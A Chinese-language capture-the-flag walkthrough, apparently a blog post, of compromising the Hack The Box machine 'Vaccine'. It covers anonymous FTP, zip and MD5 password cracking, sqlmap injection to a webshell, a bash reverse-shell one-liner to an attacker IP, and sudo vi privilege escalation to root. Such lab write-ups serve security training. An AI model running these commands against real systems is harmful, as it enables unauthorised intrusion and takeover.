[渗透测试]HTB-Vaccine

0x01 信息收集

nmap -sC -sV 10.129.41.14
发现21 ftp
22 ssh
80 web 端口开放
在这里插入图片描述
其中21端口允许anonymous匿名登录

0x02对22端口测试

ftp 10.129.41.14
anonymous
发现存在一个back.zip 文件
解压发现存在密码
在这里插入图片描述
使用zip2john backup.zip > hashes
将backup.zip 的哈希导出
在这里插入图片描述
john -wordlist=/usr/share/wordlists/rockyou.txt hashes

John 爆破只会显示第一次的结果
如果要显示之前的结果
john hashes --show
在这里插入图片描述
这里密码是741852963
解压后里面是index.php
在这里插入图片描述
md5 解码后密码是 qwerty789

0x03 对80端口进行测试

访问80端口,登录之后有一个搜索框。
在这里插入图片描述
插入一个’ 报错 应该是存在注入
用sqlmap跑一下
sqlmap -u 10.129.41.14/dashboard.php --cookie
得带上cookie 不然跑不了

在这里插入图片描述
获取到一个webshell

bash -c 'bash -i >& /dev/tcp/10.10.14.90/1234 0>&1'

kali上开启nc监听 获得一个反弹shell

在/var/www/html/dashboard.php 下发现
postgres的账号密码

在这里插入图片描述

尝试ssh登录
在这里插入图片描述
在这里插入图片描述
sudo -l 查看

发现此用户 /bin/vi 处理/etc/postgresql/11/main/pg_hba.conf 具有root权限
在这里插入图片描述
在GTFO上搜一下操作
在这里插入图片描述
获得root权限

在这里插入图片描述

0x04 总结

nmap扫描 发现开启22 21 80
21匿名登录 john 爆破backup 文件
得到网页登录密码 后台存在注入 --os-shell 成功获取 webshell
转成反弹shell 在网站下找到 ssh 密码
登录ssh sudo -l 查看可以提权的点
在gtfobin上看见提权的操作
获得root权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值